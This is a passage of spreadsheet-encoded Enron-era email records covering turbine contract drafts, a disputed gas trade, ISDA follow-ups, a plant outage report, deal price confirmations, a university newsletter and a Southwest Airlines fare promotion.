		 _x000D_
		 To: Kay Young/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: CA Data Sheet_x000D_
_x000D_
Kay, Please see attached.  Thanks._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 10:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lee.johnson@ps.ge.com'})</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'pthompson@akllp.com', 'eric.booth@enron.com'})</t>
  </si>
  <si>
    <t>RE: City of Austin Turbine Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">This looks fine to me.  Kay, when do we want to get together and sign this?_x000D_
-----Original Message-----_x000D_
From: Thompson, Peter J. [mailto:pthompson@akllp.com]_x000D_
Sent: Friday, May 18, 2001 6:12 PM_x000D_
To: Kay Mann (E-mail); Johnson, Lee L (PS, GE AEP); Shoemaker, Kent_x000D_
(GEAE); eric.booth@enron.com_x000D_
Subject: City of Austin Turbine Agreement_x000D_
_x000D_
_x000D_
Attached is a clean copy of the City of Austin Turbine Agreement_x000D_
(second document below), as well as a blacline (first document below)_x000D_
showing changes made to the version that went to GE on February 12. This_x000D_
draft includes both Lee's and Eric's changes to Exhibit A, as well as_x000D_
the addition of the contacts for notices in Sections 25.1 and 25.3.  It_x000D_
also contains a few minor clean-up items identified by Lisa Bills when_x000D_
she reviewed LV Cogen (e.g., the definitions of Performance Test_x000D_
Certificate and Performance Test Completion Certificate were out of_x000D_
order). to complete the agreement, we will need to include the date of_x000D_
execution and Exhibit H-2._x000D_
&lt;&lt;City of Austin Gas Turbine Agt - v. 5 to v. 7.DOC&gt;&gt;  &lt;&lt;City of Austin_x000D_
Gas Turbine Agreement Draft No. 7.DOC&gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 18 Dec 2000 00:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Salerno Plastic</t>
  </si>
  <si>
    <t xml:space="preserve">Richard:_x000D_
_x000D_
Have you sent a letter?  The first payment should be due (for the month of _x000D_
November, 2000, billed in early December, 2000).  Sara_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 12/18/2000 08:12 AM -----_x000D_
_x000D_
	Alan Engberg_x000D_
	12/18/2000 07:51 AM_x000D_
		_x000D_
		 To: Jennifer Blay/HOU/ECT@ECT_x000D_
		 cc: Richard B Sanders/HOU/ECT@ECT, Sara Shackleton/HOU/ECT@ECT, Douglas S _x000D_
Friedman/HOU/ECT@ECT_x000D_
		 Subject: Re: Salerno Plastic_x000D_
_x000D_
Jennifer, please continue to invoice and treat this as a confirmed trade._x000D_
_x000D_
Our legal group is investigating (Sara Shackleton and Richard Sanders) and _x000D_
will enforce the deal.  Rich and Sara, any feedback yet?_x000D_
_x000D_
Thanks,_x000D_
Alan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Jennifer Blay                           12/15/2000 08:39 AM_x000D_
	_x000D_
_x000D_
To: Alan Engberg/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Salerno Plastic_x000D_
_x000D_
Alan,_x000D_
_x000D_
We have invoiced Salerno Plastics for November settle on Deal _x000D_
Q29275.1.(-which remains active in TAGG)_x000D_
Bob at Salerno is disputing this trade due to the fact he never signed the _x000D_
contract or confirmation._x000D_
_x000D_
His #450 692-8642_x000D_
_x000D_
Please advise_x000D_
Thanks _x000D_
Jennifer_x000D_
5-7678_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 5 Jul 2000 08:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jana.morse@enron.com'})</t>
  </si>
  <si>
    <t>Aussie Deemed ISDAs</t>
  </si>
  <si>
    <t xml:space="preserve">Mark,_x000D_
I ran into Karen Lambert from the global EOL team and she asked me if I had _x000D_
heard back from you on the Australia Deemed ISDA issue.  I'm sorry to ask you _x000D_
this again, but I need to verify the information that is in the master _x000D_
matrix  for EOL trading._x000D_
_x000D_
Thanks,_x000D_
Jana x30972_x000D_
---------------------- Forwarded by Jana Morse/Corp/Enron on 06/23/2000 02:34 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Jana Morse_x000D_
06/08/2000 11:29 AM_x000D_
To: Mark Taylor/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Aussie Deemed ISDAs_x000D_
_x000D_
Mark,_x000D_
I just wanted to follow up with you to see if you had a chance to talk with _x000D_
David Minns in Sydney about their Deemed ISDAs._x000D_
_x000D_
Thanks,_x000D_
Jana x30972_x000D_
</t>
  </si>
  <si>
    <t>Tue, 15 Jan 2002 14:53:51 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'team.san-juan@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jerry.graves@enron.com', 'darrell.schoolcraft@enron.com', 'david.roensch@enron.com', 'rich.jolly@enron.com'})</t>
  </si>
  <si>
    <t>San Juan unit 1004</t>
  </si>
  <si>
    <t>Unit 1004 went down 01/15/02 @ 14:00 hrs. due to PLC Ram data loss. Program was reloaded and the unit came back at 15:03 hrs. Approximately 150mmcf was curtailed for an hour._x000D_
Blackie</t>
  </si>
  <si>
    <t>Mon, 20 Dec 1999 00:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.bernstein@enron.com'})</t>
  </si>
  <si>
    <t>The guy you are talking about left CIN under a "cloud of suspicion" sort of _x000D_
speak.  He was the one who got into several bad deals and PPA's in California _x000D_
for CIN, thus he left on a bad note.  Let me know if you need more detail _x000D_
than that, I felt this was the type of info you were looking for.  Thanks!_x000D_
Ben</t>
  </si>
  <si>
    <t>Wed, 22 Mar 2000 07:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Katie,   Looks like you got the address right.  I too enjoyed talking with _x000D_
you last night.  I know you were disappointed to be distracted from your _x000D_
research project for a while.  _x000D_
_x000D_
Its been a busy week so far.  The end of the yearly quarter always is.  Last _x000D_
minute deals have to be closed to book the income.  At this time of year the _x000D_
commercial dealmakers get that wild eyed looked which says "I have got to get _x000D_
this project done or I am out of here".  March 31 can't arrive soon enough.  _x000D_
_x000D_
Got any big plans for the weekend?  Hanging out at the Dixie Chicken or is _x000D_
that only where rookies hang out?  _x000D_
_x000D_
Take care and I'll talk to you later._x000D_
_x000D_
Gerald  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Katie McMahon &lt;katie99@tamu.edu&gt; on 03/22/2000 12:32:59 PM_x000D_
To: Gerald Nemec &lt;gerald.nemec@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Hi!_x000D_
_x000D_
_x000D_
Hey Gerald,_x000D_
 Just checking to see if I got your address right.  I enjoyed talking_x000D_
with you last night.  Have a great week! :)_x000D_
_x000D_
Katie_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 04:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Mark,</t>
  </si>
  <si>
    <t>Mark,_x000D_
_x000D_
All of my questions have been answered._x000D_
_x000D_
Thanks for your help._x000D_
_x000D_
Jason Peters</t>
  </si>
  <si>
    <t>Tue, 2 Jan 2001 06:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Please Confirm Deals - EnPower</t>
  </si>
  <si>
    <t xml:space="preserve">Phil,_x000D_
I had a some other deals in which the person is out (some until Thursday), _x000D_
please ensure that these get confirmed by the proper people.  Thanks._x000D_
ajc_x000D_
_x000D_
Colorado River Commission 473412.1 (Mark Guzman)_x000D_
Colorado River Commission 485548.1 (Leaf Harasin)_x000D_
Harbor Cogen   484383.1 (Collin Whitehead)_x000D_
Willamette Ind   478331.1 (Holden Salisbury)_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Audrey Cook/HOU/ECT on 01/02/2001 02:27 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Audrey Cook_x000D_
01/02/2001 02:19 PM_x000D_
To: Phillip Platter/HOU/ECT@ECT, Jeremy Morris/PDX/ECT@ECT_x000D_
cc: Kelley Huntley/HOU/ECT@ECT, Rhonda Robinson/HOU/ECT@ECT _x000D_
Subject: Please Confirm Deals - EnPower_x000D_
_x000D_
Phil &amp; Jeremy,_x000D_
Please confirm that the following deals should have "zero prices" in _x000D_
Enpower.  If the deal does require a price, please ensure that the price is _x000D_
entered into EnPower by 12:00 P.M. (CST) Wednesday, January 3 due to our _x000D_
accounting close deadlines.  If possible, when completed, please send me a _x000D_
status e-mail.  Thanks for your help in advance!!_x000D_
_x000D_
Delano Energy Co  481276.1_x000D_
Delano Energy Co  485049.1_x000D_
Tosco    481220.1_x000D_
Tosco    481275.1_x000D_
Tosco    485046.1_x000D_
Wheelabrator Martel  481221.1_x000D_
Wheelabrator Martel  481274.1_x000D_
Wheelabrator Martel  485047.1_x000D_
 Atlantic Richfield  481222.1_x000D_
Atlantic Richfield  481277.1_x000D_
Atlantic Richfield  485048.1_x000D_
_x000D_
ajc_x000D_
_x000D_
I can be reached at (713) 853-4317 if you have any further questions._x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Nov 2001 08:21:11 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dbrock@howard.edu'})</t>
  </si>
  <si>
    <t>frozenset({'allstudents@howard.edu', 'faculty@law.howard.edu', 'allemployees@howard.edu'})</t>
  </si>
  <si>
    <t>What's New at Howard University</t>
  </si>
  <si>
    <t>Good Afternoon!_x000D_
It's Wednesday, November 7, 2001._x000D_
Today's news awaits...!_x000D_
_x000D_
_x000D_
&gt;&gt;WHAT IS HOWARD TALKING ABOUT TODAY?_x000D_
_x000D_
	&gt;Experts Offer Answers on Anthrax (11/08/01)_x000D_
	All members of the entire Howard University community-students,_x000D_
staff and faculty-- are invited_x000D_
	to attend a forum on "Anthrax and Other Biowarfare Agents, "_x000D_
Thursday, November 8 from 3-5 p.m._x000D_
	in the School of Business Auditorium  For more information,  visit_x000D_
the "Campus Happenings" web site_x000D_
	or contact Clyde Cash at 806-5770._x000D_
_x000D_
_x000D_
	&gt;Free Dinner Theater Features Documentary on Bunche (11/13/01)_x000D_
	Howard University's Ralph J. Bunche International Affairs Center and_x000D_
the United Nations_x000D_
	(Washington, D.C. Bureau) invite you to join them on November 13th_x000D_
at 6:00 pm for a FREE_x000D_
	screening of "RALPH BUNCHE: AN AMERICAN ODYSSEY," including a free_x000D_
light supper_x000D_
	in honor of the work  of Dr. Ralph Bunche.   The event will be_x000D_
screened in the Blackburn Center._x000D_
	Guests are asked to RSVP by Wednesday, Nov. 7 (jdixon@unicwash.org_x000D_
or 202-454-2112)._x000D_
_x000D_
_x000D_
&gt;&gt;WHAT ELSE IS HOWARD TALKING ABOUT TODAY?_x000D_
_x000D_
	&gt;&gt;-Free Flu Shots, HIV Testing for Students 	(TODAY, 10 a.m. - 3_x000D_
p.m., Blackburn)_x000D_
_x000D_
	&gt;&gt;-"Piano Lesson" Begins in Ira Aldridge		(TONIGHT,_x000D_
7:30 p.m., Ira Aldridge Theater)_x000D_
_x000D_
	&gt;-Forum on (Workplace) Health Issues Set		(11/08/01)_x000D_
_x000D_
	&gt;-Town Meeting Offers Genome Answers 		(11/10/01)_x000D_
_x000D_
	&gt;-New American Fellowships Offered 		(11/11/01)_x000D_
_x000D_
	&gt;-Ambassador Advocates World Citizenship 	(11/14/01)_x000D_
_x000D_
	&gt;-Carnegie President to Deliver Keynote Address 	(11/14/01)_x000D_
_x000D_
	&gt;-Jazz Ensemble Plays Up "Peace and Love" 	(11/15/01)_x000D_
_x000D_
	&gt;-Student Service Results in Free Screenings 	(11/16/01)_x000D_
_x000D_
	&gt;-Alumni Artist Shares Passions, Perspectives 	(11/18/01)_x000D_
_x000D_
	&gt;-Fulbright Participants Urged to Extol Opportunities_x000D_
_x000D_
_x000D_
For more Howard University news and information:_x000D_
http://www.howard.edu/newsevents/campushappenings</t>
  </si>
  <si>
    <t>Tue, 1 Jan 2002 01:02:06 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
=================================================================_x000D_
SOUTHWEST AIRLINES' CLICK 'N SAVE E-MAIL UPDATE_x000D_
January 1, 2002_x000D_
=================================================================_x000D_
_x000D_
THE FIRST DAY OF 2002! _x000D_
_x000D_
Horns are blowing._x000D_
We're making a toast._x000D_
_x000D_
To the greatest Customers, Coast to Coast:_x000D_
_x000D_
Here's to a New Year of LUV_x000D_
That comes from the heart_x000D_
We wish you prosperity, _x000D_
on this brand new start. _x000D_
_x000D_
Happy New Year!_x000D_
_x000D_
=================================================================_x000D_
IMPORTANT TRAVEL INFORMATION_x000D_
=================================================================_x000D_
_x000D_
For updated travel information, please visit:_x000D_
http://www.southwest.com/travel_center/travelAdvisory.html_x000D_
_x000D_
=================================================================_x000D_
THIS WEEK'S SPECIALS_x000D_
=================================================================_x000D_
1. southwest.com Specials for purchase through January 3, 2002_x000D_
2. Subscriber Information_x000D_
_x000D_
=================================================================_x000D_
CLICK 'N SAVE SPECIALS_x000D_
=================================================================_x000D_
Albany, NY_x000D_
 $77 one-way, to/from Jacksonville, FL_x000D_
 $68 one-way, to/from Louisville, KY_x000D_
  _x000D_
Albuquerque, NM_x000D_
 $99 one-way, to/from Kansas City, MO_x000D_
 $41 one-way, to/from Tucson, AZ_x000D_
  _x000D_
Amarillo, TX_x000D_
 $99 one-way, to/from New Orleans, LA_x000D_
 $63 one-way, to/from San Antonio, TX_x000D_
  _x000D_
Austin, TX_x000D_
 $42 one-way, to/from Midland/Odessa, TX_x000D_
 $99 one-way, to/from Phoenix, AZ_x000D_
  _x000D_
Baltimore Washington Int'l, MD_x000D_
 $52 one-way, to/from Chicago Midway, IL_x000D_
 $35 one-way, to/from Cleveland, OH_x000D_
  _x000D_
Birmingham, AL_x000D_
 $62 one-way, to/from Chicago Midway, IL_x000D_
 $54 one-way, to/from St. Louis, MO_x000D_
  _x000D_
Boise, ID_x000D_
 $37 one-way, to/from Reno/Tahoe, NV_x000D_
 $34 one-way, to/from Spokane, WA_x000D_
  _x000D_
Buffalo/Niagara Falls, NY_x000D_
 $48 one-way, to/from Norfolk, VA/Southern Virginia_x000D_
 $70 one-way, to/from Tampa Bay, FL_x000D_
  _x000D_
Burbank, CA_x000D_
 $35 one-way, to/from Las Vegas, NV_x000D_
 $99 one-way, to/from Portland, OR_x000D_
  _x000D_
Chicago Midway, IL_x000D_
 $52 one-way, to/from Baltimore Washington Int'l, MD_x000D_
 $62 one-way, to/from Birmingham, AL_x000D_
  _x000D_
Cleveland, OH_x000D_
 $35 one-way, to/from Baltimore Washington Int'l, MD_x000D_
 $99 one-way, to/from New Orleans, LA_x000D_
  _x000D_
Columbus, OH_x000D_
 $99 one-way, to/from Ft. Lauderdale/Hollywood, FL_x000D_
 $64 one-way, to/from Tampa Bay, FL_x000D_
  _x000D_
Corpus Christi, TX_x000D_
 $48 one-way, to/from Dallas Love Field, TX_x000D_
 $65 one-way, to/from Little Rock, AR_x000D_
  _x000D_
Dallas Love Field, TX_x000D_
 $48 one-way, to/from Corpus Christi, TX_x000D_
 $36 one-way, to/from Tulsa, OK_x000D_
  _x000D_
Detroit, MI_x000D_
 $63 one-way, to/from Omaha, NE_x000D_
 $52 one-way, to/from Raleigh-Durham, NC_x000D_
  _x000D_
El Paso, TX_x000D_
 $99 one-way, to/from Houston Bush Intercontinental, TX_x000D_
 $99 one-way, to/from Houston Hobby, TX_x000D_
 $79 one-way, to/from Los Angeles, CA_x000D_
  _x000D_
Ft. Lauderdale/Hollywood, FL_x000D_
 $99 one-way, to/from Columbus, OH_x000D_
 $34 one-way, to/from Orlando, FL_x000D_
  _x000D_
Harlingen/South Padre Island, TX_x000D_
 $89 one-way, to/from Oklahoma City, OK_x000D_
 $38 one-way, to/from San Antonio, TX_x000D_
  _x000D_
Hartford, CT/Springfield, MA_x000D_
 $99 one-way, to/from Jackson, MS_x000D_
 $50 one-way, to/from Raleigh-Durham, NC_x000D_
  _x000D_
Houston Bush Intercontinental, TX_x000D_
 $99 one-way, to/from El Paso, TX_x000D_
 $55 one-way, to/from Little Rock, AR_x000D_
 $55 one-way, to/from Oklahoma City, OK_x000D_
  _x000D_
Houston Hobby, TX_x000D_
 $99 one-way, to/from El Paso, TX_x000D_
 $55 one-way, to/from Little Rock, AR_x000D_
 $55 one-way, to/from Oklahoma City, OK_x000D_
  _x000D_
Indianapolis, IN_x000D_
 $99 one-way, to/from Manchester, NH_x000D_
 $99 one-way, to/from Providence, RI_x000D_
  _x000D_
Jackson, MS_x000D_
 $99 one-way, to/from Hartford, CT/Springfield, MA_x000D_
 $99 one-way, to/from Phoenix, AZ_x000D_
  _x000D_
Jacksonville, FL_x000D_
 $77 one-way, to/from Albany, NY_x000D_
 $40 one-way, to/from Norfolk, VA/Southern Virginia_x000D_
  _x000D_
Kansas City, MO_x000D_
 $99 one-way, to/from Albuquerque, NM_x000D_
 $99 one-way, to/from Midland/Odessa, TX_x000D_
  _x000D_
Las Vegas, NV_x000D_
 $35 one-way, to/from Burbank, CA_x000D_
 $48 one-way, to/from Oakland, CA_x000D_
 $36 one-way, to/from Phoenix, AZ_x000D_
 $40 one-way, to/from San Diego, CA_x000D_
  _x000D_
Little Rock, AR_x000D_
 $65 one-way, to/from Corpus Christi, TX_x000D_
 $55 one-way, to/from Houston Bush Intercontinental, TX_x000D_
 $55 one-way, to/from Houston Hobby, TX_x000D_
  _x000D_
Long Island/Islip, NY_x000D_
 $34 one-way, to/from Providence, RI_x000D_
 $79 one-way, to/from West Palm Beach, FL_x000D_
  _x000D_
Los Angeles, CA_x000D_
 $79 one-way, to/from El Paso, TX_x000D_
 $46 one-way, to/from Reno/Tahoe, NV_x000D_
 $99 one-way, to/from Seattle/Tacoma, WA_x000D_
  _x000D_
Louisville, KY_x000D_
 $68 one-way, to/from Albany, NY_x000D_
 $69 one-way, to/from Orlando, FL_x000D_
  _x000D_
Lubbock, TX_x000D_
 $99 one-way, to/from St. Louis, MO_x000D_
 $61 one-way, to/from Tulsa, OK_x000D_
  _x000D_
Manchester, NH_x000D_
 $99 one-way, to/from Indianapolis, IN_x000D_
 $89 one-way, to/from Nashville, TN_x000D_
  _x000D_
Midland/Odessa, TX_x000D_
 $42 one-way, to/from Austin, TX_x000D_
 $99 one-way, to/from Kansas City, MO_x000D_
  _x000D_
Nashville, TN_x000D_
 $89 one-way, to/from Manchester, NH_x000D_
 $66 one-way, to/from West Palm Beach, FL_x000D_
  _x000D_
New Orleans, LA_x000D_
 $99 one-way, to/from Amarillo, TX_x000D_
 $99 one-way, to/from Cleveland, OH_x000D_
  _x000D_
Norfolk, VA/Southern Virginia_x000D_
 $48 one-way, to/from Buffalo/Niagara Falls, NY_x000D_
 $40 one-way, to/from Jacksonville, FL_x000D_
  _x000D_
Oakland, CA_x000D_
 $48 one-way, to/from Las Vegas, NV_x000D_
 $49 one-way, to/from Seattle/Tacoma, WA_x000D_
  _x000D_
Oklahoma City, OK_x000D_
 $89 one-way, to/from Harlingen/South Padre Island, TX_x000D_
 $55 one-way, to/from Houston Bush Intercontinental, TX_x000D_
 $55 one-way, to/from Houston Hobby, TX_x000D_
  _x000D_
Omaha, NE_x000D_
 $63 one-way, to/from Detroit, MI_x000D_
 $99 one-way, to/from Sacramento, CA_x000D_
  _x000D_
Ontario, CA_x000D_
 $34 one-way, to/from Phoenix, AZ_x000D_
 $38 one-way, to/from San Jose, CA_x000D_
  _x000D_
Orlando, FL_x000D_
 $34 one-way, to/from Ft. Lauderdale/Hollywood, FL_x000D_
 $69 one-way, to/from Louisville, KY_x000D_
  _x000D_
Phoenix, AZ_x000D_
 $99 one-way, to/from Austin, TX_x000D_
 $99 one-way, to/from Jackson, MS_x000D_
 $36 one-way, to/from Las Vegas, NV_x000D_
 $34 one-way, to/from Ontario, CA_x000D_
  _x000D_
Portland, OR_x000D_
 $99 one-way, to/from Burbank, CA_x000D_
 $94 one-way, to/from Tucson, AZ_x000D_
  _x000D_
Providence, RI_x000D_
 $99 one-way, to/from Indianapolis, IN_x000D_
 $34 one-way, to/from Long Island/Islip, NY_x000D_
  _x000D_
Raleigh-Durham, NC_x000D_
 $52 one-way, to/from Detroit, MI_x000D_
 $50 one-way, to/from Hartford, CT/Springfield, MA_x000D_
  _x000D_
Reno/Tahoe, NV_x000D_
 $37 one-way, to/from Boise, ID_x000D_
 $46 one-way, to/from Los Angeles, CA_x000D_
  _x000D_
Sacramento, CA_x000D_
 $99 one-way, to/from Omaha, NE_x000D_
 $42 one-way, to/from San Diego, CA_x000D_
  _x000D_
Salt Lake City, UT_x000D_
 $50 one-way, to/from San Jose, CA_x000D_
 $49 one-way, to/from Spokane, WA_x000D_
  _x000D_
San Antonio, TX_x000D_
 $63 one-way, to/from Amarillo, TX_x000D_
 $38 one-way, to/from Harlingen/South Padre Island, TX_x000D_
  _x000D_
San Diego, CA_x000D_
 $40 one-way, to/from Las Vegas, NV_x000D_
 $42 one-way, to/from Sacramento, CA_x000D_
  _x000D_
San Jose, CA_x000D_
 $38 one-way, to/from Ontario, CA_x000D_
 $50 one-way, to/from Salt Lake City, UT_x000D_
  _x000D_
Seattle/Tacoma, WA_x000D_
 $99 one-way, to/from Los Angeles, CA_x000D_
 $49 one-way, to/from Oakland, CA_x000D_
  _x000D_
Spokane, WA_x000D_
 $34 one-way, to/from Boise, ID_x000D_
 $49 one-way, to/from Salt Lake City, UT_x000D_
  _x000D_
St. Louis, MO_x000D_
 $54 one-way, to/from Birmingham, AL_x000D_
 $99 one-way, to/from Lubbock, TX_x000D_
  _x000D_
Tampa Bay, FL_x000D_
 $70 one-way, to/from Buffalo/Niagara Falls, NY_x000D_
 $64 one-way, to/from Columbus, OH_x000D_
  _x000D_
Tucson, AZ_x000D_
 $41 one-way, to/from Albuquerque, NM_x000D_
 $94 one-way, to/from Portland, OR_x000D_
  _x000D_
Tulsa, OK_x000D_
 $36 one-way, to/from Dallas Love Field, TX_x000D_
 $61 one-way, to/from Lubbock, TX_x000D_
  _x000D_
West Palm Beach, FL_x000D_
 $79 one-way, to/from Long Island/Islip, NY_x000D_
 $66 one-way, to/from Nashville, TN_x000D_
_x000D_
=================================================================_x000D_
IMPORTANT DETAILS_x000D_
=================================================================_x000D_
*Available only on southwest.com._x000D_
*21-day advance purchase required._x000D_
*Available on published, scheduled service._x000D_
*Fares shown are one-way and do not include federal_x000D_
 excise tax of up to $3.00 for each flight segment. _x000D_
 (a segment is defined as a takeoff and landing)_x000D_
*Fares do not include airport-assessed passenger _x000D_
 facility charges (PFC) of up to $9 one-way._x000D_
*Fares do not include security fee._x000D_
*Fares are nonrefundable, but (except for tickets _x000D_
 purchased through our Group Tickets Program) _x000D_
 may be applied toward future travel on Southwest Airlines. _x000D_
*Travel January 21, 2002 through end of schedule, _x000D_
 except May 24, and 27, 2002._x000D_
*Purchase through January 3, 2002,  midnight Pacific Time._x000D_
*Fares are available one-way or can be combined _x000D_
 with other fare types.  Most restrictive rules of combined_x000D_
 fares will apply._x000D_
*Penalty applies to any changes made after purchasing_x000D_
 Southwest Internet Specials._x000D_
_x000D_
For more details, please visit us at:_x000D_
http://www.southwest.com/jp/hotfares2.shtml?src=e010102_x000D_
_x000D_
=================================================================_x000D_
ADDITIONAL INFORMATION_x000D_
=================================================================_x000D_
Additional information you need to know about all of our _x000D_
air fare specials:_x000D_
_x000D_
*Changes to any portion of the reservation _x000D_
 (flight, dates, cities, and/or names of passengers), _x000D_
 once purchased, will result in the cancellation of _x000D_
 the ENTIRE reservation and rebooking at the lowest _x000D_
 fare available which could result in a fare increase. _x000D_
*Southwest specials are nonchangeable _x000D_
 and nonrefundable. _x000D_
*Ticketless Travel may be purchased online using _x000D_
 either a credit card or by utilizing funds from a _x000D_
 previously unused or cancelled Ticketless _x000D_
 Travel reservation(s).  Funds from up to four cancelled _x000D_
 or unused Ticketless Travel reservation records can _x000D_
 be combined to purchase a new Ticketless Travel_x000D_
 reservation record.  Southwest Airlines travel credit _x000D_
 (e.g., travel voucher, gift certificate, discount coupon) _x000D_
 may not be used as forms of payment for _x000D_
 Ticketless Travel Online._x000D_
*Unused funds may be applied toward future travel on _x000D_
 Southwest Airlines within one year of the original purchase date._x000D_
*Seats are limited and won't be available on some _x000D_
 flights that operate during very busy travel times _x000D_
 and holiday periods such as Presidents Day and Memorial Day._x000D_
*Standby travel requires an upgrade to the _x000D_
 full unrestricted fare._x000D_
_x000D_
=================================================================_x000D_
SUBSCRIBER INFORMATION _x000D_
=================================================================_x000D_
Please pass this great news on to your friends._x000D_
To subscribe to Southwest Airlines Click 'n Save E-mail _x000D_
Updates, visit: _x000D_
http://www.southwest.com/email/_x000D_
_x000D_
Remember, if you change your Internet service provider,_x000D_
you will need to unsubscribe and resubscribe in order _x000D_
to continue receiving Click 'n Save E-mail Updates._x000D_
For administration on your e-mail subscription, please visit:_x000D_
http://www.southwest.com/email/emailUnsubscribe.html_x000D_
_x000D_
=================================================================_x000D_
You may retrieve and print a copy of your Southwest _x000D_
Airlines Ticketless Travel at: _x000D_
http://www.southwest.com/travel_center/retrieveItinerary.html_x000D_
_x000D_
Questions about your flight arrival or departure time?  _x000D_
Please visit us at:_x000D_
http://www.southwest.com/cgi-bin/selectFlight_x000D_
_x000D_
=================================================================_x000D_
_x000D_
This is a post only mailing from Southwest Airlines._x000D_
Please do not attempt to respond to this message._x000D_
_x000D_
Copyright 2002 Southwest Airlines Co. All Rights Reserved._x000D_
_x000D_
_x000D_
---_x000D_
You are currently subscribed to special-offers as: ebass@enron.com_x000D_
You can unsubscribe anytime at http://www.southwest.com/email/</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 11:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>?_x000D_
 - santa22.jpg</t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 03:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kerrymcelroy@dwt.com'})</t>
  </si>
  <si>
    <t>frozenset({'bpadiscovery@merkellaw.com', 'efinklea@energyadvocates.com', 'schall@stoel.com', 'michaelearly@earthlink.net', 'dfaulk@puget.com', 'mmetzler@ci.tacoma.wa.us', 'jeffn@subutil.com', 'energlaw@aol.com', 'simonf@atg.wa.gov', 'lawyer@teleport.com', 'lwolv@worldaccessnet.com', 'pete@ashland.or.us', 'sjohnsto@wutc.wa.gov', 'dws@keywaycorp.com', 'jdeason@chbh.com', 'pvickery@tpud.org', 'terrym@millcreeklaw.com', 'pljacklin@stoel.com', 'eric.larson@oremetwahchang.com', 'mershanlaw@aol.com', 'ghuhta@cowlitzpud.org', 'rkindley@schwabe.com', 'alan@epud.org', 'ias@dvclaw.com', 'john.yanov@eweb.eugene.or.us', 'gregb@clatskanie.com', 'crow@millernash.com', 'huse@eesconsulting.com', 'mhain@ect.enron.com', 'doney@doneylaw.com', 'jeff.schlect@avistacorp.com', 'jhartso@enron.com', 'jack.speer@alcoa.com', 'jacksonc@ida.net', 'creali@vanalco.com', 'jpw@duncanallen.com', 'pfox@bracepatt.com', 'darcy@tonkon.com', 'townsend@chbh.com', 'rachel@rnp.org', 'kevinbell@cvresearch.com', 'lyn_williams@pgn.com', 'kmoxness@cencoast.com', 'lhamilton@avistaenergy.com', 'rfoiani@gcpud.org', 'cub@teleport.com', 'pmurphy@mbllp.com', 'dmacgregor@morganlewis.com', 'johk@critfc.org', 'scott.brattebo@pacificorp.com', 'seligman@teleport.com', 'kyle@ppcpdx.org', 'steve@nwenergy.org', 'bassl@sce.com', 'rle@givenspursley.com', 'jlh@mc-power.com', 'dbouchard@ci.forest-grove.or.us', 'rbstrong@painehamblen.com', 'bferranti@mbllp.com', 'wmgt3@montana.com', 'eauverde@hotmail.com', 'dbkinnard@pplmt.com', 'peter@richardsonandoleary.com', 'kevin.clark@ci.seattle.wa.us', 'skaravit@ci.tacoma.wa.us', 'marss@perkinscoie.com', 'rpierce@avistaenergy.com', 'erick_johnson@pngc.com', 'stephens@eslerstephens.com', 'tgrim@chbh.com', 'lpeters@pacifier.com', 'ali.rodol@ci.seattle.wa.us', 'janet.prewitt@state.or.us', 'pspi@dynegy.com', 'sonyamt@premier1.net', 'abuckley@wutc.wa.gov', 'mstauffer@mtpower.com', 'cwagers@dcpud.org', 'pete.forsyth@kaiseral.com', 'tdeboer@painehamblen.com', 'jdwright@bpa.gov', 'jrb_ora@televar.com', 'dparrish@prmllp.com', 'darkills@popud.com', 'dan.meek@usa.net', 'kknitte@gcpud.org', 'elisackf@aol.com', 'pnichols@idahopower.com', 'doug_brawley@pngc.com', 'pjburger@bpa.gov', 'pobenchain@idahopower.com', 'mthomas@mtpower.com', 'matts1@atg.wa.gov', 'weavertr@yakima-wa.com', 'marc.hellman@state.or.us', 'jsaven@pacifier.com', 'mike.macdougall@powerex.com', 'tstevenson@ci.burbank.ca.us', 'ccopatrny@e-z.net', 'bessex@cowlitzpud.org', 'aw_turner@pgn.com'})</t>
  </si>
  <si>
    <t>Oral Argument Request</t>
  </si>
  <si>
    <t xml:space="preserve"> - Oral Argument Request.doc</t>
  </si>
  <si>
    <t>Wed, 28 Nov 2001 07:23:23 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'a..howard@enron.com', 'tracy.geaccone@enron.com', 'james.saunders@enron.com'})</t>
  </si>
  <si>
    <t>RE: NNG/Dynegy Due Diligence</t>
  </si>
  <si>
    <t>I meant to try and explain, not to redo.  Only as a last resort&lt;ould we wantto redo_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Tue, 31 Oct 2000 07:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Dave,_x000D_
